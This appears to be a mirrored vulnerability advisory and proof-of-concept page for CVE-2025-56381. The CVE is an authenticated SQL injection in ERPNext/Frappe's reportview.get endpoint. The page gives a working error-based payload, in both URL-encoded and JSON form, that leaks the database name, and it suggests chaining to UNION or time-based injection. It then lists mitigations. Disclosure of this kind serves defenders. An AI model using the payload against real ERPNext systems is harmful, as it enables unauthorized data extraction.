Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-56381 PoC — ERPNEXT 安全漏洞

Source
https://github.com/MoAlali/CVE-2025-56381
Associated Vulnerability
Title:ERPNEXT 安全漏洞 (CVE-2025-56381)
Description:ERPNext是印度ERPNext公司的一套开源的企业资源计划解决方案。 ERPNEXT v15.67.0版本存在安全漏洞,该漏洞源于order_by和group_by参数未经验证,可能导致SQL注入攻击。
Description
ERPNEXT v15.67.0 was discovered to contain multiple SQL injection  vulnerabilities in the /api/method/frappe.desk.reportview.get endpoint via the order_by and group_by parameters.
Readme
# CVE-2025-56381 — Authenticated SQL Injection in ERPNext / Frappe via `order_by` and `group_by` Parameters

📌 **Summary**
ERPNext v15.67.0 and Frappe Framework v15.72.4 contain multiple **authenticated SQL injection vulnerabilities** in the `frappe.desk.reportview.get` API endpoint. Malicious input to the `order_by` or `group_by` parameters can be used to inject and execute arbitrary SQL statements. This allows an authenticated user (with basic access to reports) to extract sensitive data, perform database enumeration, and potentially manipulate or escalate privileges within the system.

---

## 🛠 Technical Details

* **Vulnerability Type:** SQL Injection (CWE-89)
* **Affected Product(s):** ERPNext / Frappe
* **Affected Versions:**

  * Frappe — **15.72.4**
  * ERPNext — **15.67.0**
* **Affected Endpoint:**

  ```
  POST /api/method/frappe.desk.reportview.get
  ```
* **Vulnerable Parameters:**

  * `order_by`
  * `group_by`
* **Authentication Required:** Yes (valid session via `sid` cookie)
* **Attack Type:** Remote
* **Severity:** High (SQL code execution, data exfiltration, potential privilege escalation)
* **Estimated CVSS v3.1 Score:** **8.6 (High)** — *estimate; final score should be assigned by official CVE authority.*
* **Status:** Not fixed (as of disclosure)
* **Discovered by:** Mohammed Aloli ([GitHub](https://github.com/MoAlali), [X](https://x.com/alaliksa_), [LinkedIn](https://www.linkedin.com/in/mohammedaloli/))
* **CVE ID:** **CVE-2025-56381**

---

## 🚀 Proof of Concept (PoC) — Error-based SQL Injection
<img width="1072" height="1376" alt="image" src="https://github.com/user-attachments/assets/ef4a77fa-a9f5-417f-baf0-5ebcef3523ce" />

> ✅ Test only on systems you **own** or have **explicit permission** to test. Do **not** use against production systems without consent.

### ❗ Payload (URL-encoded):

```text
%28select%20updatexml%28null%2Cconcat%280x7e%2Cdatabase%28%29%2C0x7e%29%2Cnull%29%29
```

### Example JSON Body (POST Request):

```json
{
  "doctype": "User",
  "order_by": "(select updatexml(null,concat(0x7e,database(),0x7e),null))"
}
```
This confirms that SQL injection has been successfully executed and the current database name has been leaked.

---

## 🧪 Exploitation Scenario

1. An attacker logs into an ERPNext/Frappe instance with basic permissions (e.g., access to standard reports).
2. A crafted POST request is sent to `/api/method/frappe.desk.reportview.get` with a malicious `order_by` or `group_by` payload.
3. The backend improperly injects this value directly into an SQL query without sanitization.
4. The attacker sees a database error revealing injected output — confirming the injection.
5. The same technique could be chained with time-based payloads, UNION-based injection, or privilege escalation paths depending on the underlying database configuration.

---

## 🔐 Mitigation Recommendations

1. **Use Parameterized Queries:** All user input must be bound securely and **never** concatenated directly into SQL queries.
2. **Strict Input Validation:** Validate `order_by` and `group_by` against a known allowlist of acceptable column names before processing.
3. **Escape Identifiers Properly:** Use DBMS-specific escaping for column/field identifiers if dynamic usage is required.
4. **Minimize Exposure:** Restrict access to the `/reportview.get` API and report features based on user roles and trust levels.
5. **Sanitize Logs:** Avoid logging raw injection payloads to prevent leakage in audit systems.
6. **Rate Limit API Requests:** Throttle high-frequency API calls to reduce the impact of blind or error-based enumeration attempts.
7. **Apply Patches:** Frappe maintainers should release a patch securing this endpoint and audit other `frappe.desk` methods. Operators should upgrade as soon as a patch is available.

---

## 🔗 References

* Discoverer: [Mohammed Aloli](https://www.linkedin.com/in/mohammedaloli/)

  * GitHub: [MoAlali](https://github.com/MoAlali)
  * X (Twitter): [@alaliksa_](https://x.com/alaliksa_)
* Frappe Framework: [https://github.com/frappe/frappe](https://github.com/frappe/frappe)
* ERPNext Project: [https://github.com/frappe/erpnext](https://github.com/frappe/erpnext)
* OWASP SQL Injection Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)

## 📢 Disclaimer

This advisory is published for educational and defensive security research purposes only. Exploiting this vulnerability without authorization is illegal and unethical. If you're a developer or administrator of ERPNext or Frappe, apply the recommended mitigations immediately and monitor for unusual API usage.

---
File Snapshot

 [4.0K]  /data/pocs/57275b719f4dfb7e950d525c95367d638f187531
├── [1.2K]  advisory.md
├── [1.5K]  cve.json
└── [4.7K]  README.md

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.